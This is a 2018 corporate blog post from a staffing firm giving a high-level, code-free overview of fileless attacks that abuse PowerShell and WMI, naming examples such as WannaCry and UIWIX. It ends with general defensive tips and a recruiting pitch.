Non-Malware Attacks: What You Need to Know

Posted by Jeff Pelliccio on Sep 7, 2018 9:00:00 AM

In ICS insights, IT, client

Do you know what a non-malware attack is or how they differ from more traditional attacks? Do you know why they are so dangerous, or what you can do to prevent attacks? If not, don’t worry – you are not alone. Here you can find the answers to all of these questions and more.

According to experts, non-malware attacks are on the rise. In fact, a recent study performed by the Ponemon Institute showed that 29 percent of all attacks that organizations experienced in 2017 were actually fileless. Additionally, it is estimated that by the end of this year, attacks will increase significantly, exceeding the 35 percent range.

Now, let's dive into non-malware attacks and how they are different from traditional attacks, as well as other, important information you need to know.

Non-Malware Attacks Explained

A non-malware attack, which is also referred to as a fileless attack, is a cyber attack where the malicious code has nobody in the actual file system. Unlike the attacks that are done by traditional malicious software, a non-malware attack does not require that any software is installed on the person’s machine. Essentially, innovative hackers have found methods to actually turn the Windows program against itself and then carry out various fileless attacks by using the pre-existing tools found in Windows.

The general idea behind this type of non-malware attack is actually simple – rather than dropping custom tools that could be flagged as being malware, a hacker uses the tools that are currently on the device. This is how the hacker takes over a legitimate system process and then runs the malicious code in the memory space. You may hear this approach also referred to as “living off the land.”

The Process of a Non-Malware Attack

Usually, but not always, a non-malware attack will follow this chain of events:

  • A computer user visits a website that’s infected or opens an infected email

  • Then an exploit kit scans the computer for any vulnerabilities and uses them for inserting some type of malicious code into one of the Windows systems administration tools

  • The fireless malware will then run its payload in the available DLL and attack in the computer’s memory, which will hide in one of the legitimate Windows processes

The challenging part of fileless malware is that it is downloaded from either an infected email or website, or it can be introduced as a malicious code from an application that is already infected or even distributed in a zero-day vulnerability.

The Danger of Non-Malware Attacks

One of the biggest challenges that are posed by the fileless malware attack is that it doesn't use traditional malware. As a result, there are no signatures that anti-malware can use to find it. As a result, finding or detecting a fileless attack is something that’s extremely challenging.

To better understand why this type of attack is so dangerous, it’s a good idea to look at some of the most recent incidents of these attacks.

One of the very first instances of a situation involving fileless malware was something called the TSR – Terminate-Stay-Resident – viruses. These viruses actually had a presence where they began, but after the malicious code had loaded into the memory, the executable file was deleted.

The malware that targets the vulnerabilities in PowerShell and JavaScript scripts are also considered to be fileless. Even the well-known ransomware attacks, Petya and WannaCry, utilized fileless techniques as a part of their kill chains.

Another known example of this type of attack is referred to as the UIWIX threat. Similar to Petya and WannaCry, UIWIX utilized the EternalBlue exploit. It does not drop any actual files on the disk. Instead, it allows the installation of something called the DoublePulsar backdoor, which lives in the kernel’s memory.

How Do the Non-Malware Attacks Actually Work?

Because the non-malware attacks use the pre-existing, default Windows tools, they can hide the malicious activity behind the real, legitimate Windows processes. This means that they become almost completely undetectable for the majority of anti-malware products.

The Primary Non-Malware Attack Targets

A hacker has to acquire quite a few resources to ensure their malicious activity remains undetected. This is why most fileless attacks will focus one of the following two targets:

  • PowerShell

  • WMI – Windows Management Instrumentation

Based on the targets, the fileless attacks might run on exploit vulnerabilities or RAM in the software scripts. The attackers choose these two targets for a number of reasons. The first reason is that these types of tools are built into all modern versions of Windows OS. This makes it easier for the hackers to spread the malicious code. The second reason these are common targets is that if a user were to turn off these tools, then their ability to do many tasks would be severely limited. However, there are some experts who have suggested that disabling PowerShell and WMI is a great way to prevent these fileless attacks.

4 Commonly Seen Types of Non-Malware Attacks

There are several variations and types of fileless attacks. Here, you can learn about the four that are most commonly seen.

  • The fileless persistence methods: This is when the malicious code is still running after a system reboot. For example, the malicious scripts may have been stored in the Windows Registry, and then re-start the infection after a reboot is done.

  • Memory-only threats: This type of attack executes the play load in the memory, which is done by exploiting the vulnerabilities present in the Windows services. When a reboot is done, the infection will disappear.

  • Dual Use tools: These will use the pre-existing system tools in Windows for various malicious purposes.

  • PE or non-portable file attacks: This type of attack is considered a dual-use tool attack. It uses real Windows applications and tools, along with WScript, CScript and PowerShell.

Techniques Used by Non-Malware Attacks

To execute a non-malware attack, a hacker will use various techniques. Some of the ones that are most frequently used for these types of attacks include:

  • WMI persistence: The WIM repository can be used to store malicious scripts that are able to be periodically invoked through WMI bindings.

  • Script based techniques: Some hackers use script files to embed the encoded shellcodes or the binaries without actually creating any type of file on the disk. The scripts are then decrypted while on the fly and then they are executed through .NET objects.

  • Memory exploits: This fileless malware has the ability to be executed and run remotely by using memory exploits on the victim’s machine.

  • Reflective DLL injection: A malicious DLL can become manually embedded in a process’s memory without any need to save the DLL’s on the disk. It can then be put into infected scripts or macros, or even hosted on a remote machine and then delivered through a type of staged network channel.

Now, it is time to learn how to protect against non-malware attacks.

5 Effective Ways to Protect Yourself Against Non-Malware Attacks

The experts have come up with several ways you can prevent and stop any instances of fileless malware. This includes disabling the Windows tools that are most vulnerable to this attack or using next-generation solutions related to anti-malware. The following five tips can also help to protect your company and prevent attacks.  

  • Restrict any unneeded management framework

  • Disable all macros

  • Use the most innovative endpoint security solutions

  • Monitor any and all unauthorized traffic

  • Make sure all your devices are updated regularly

Make Sure You're Prepared 

The fact is, the instances of fileless attacks are definitely on the rise. This is mainly due to the fact that they are difficult to detect with standard anti-malware solutions. Even though the ability to detect non-malware threats is still challenging, this guide can help you prevent the possibility of a non-malware attack.  

To stay ahead of this threat, make sure you hire professionals who are up to date with the latest threats. They are your first line of defense when it comes to protecting your company and its information. Don't be caught without the proper resources because you will lose more than just data; you could also lose the trust of your consumers. Contact ICS now to find the people you need to identify where your weaknesses are and how to fix them. 

Find Talent NOW

FTN Accounting Finance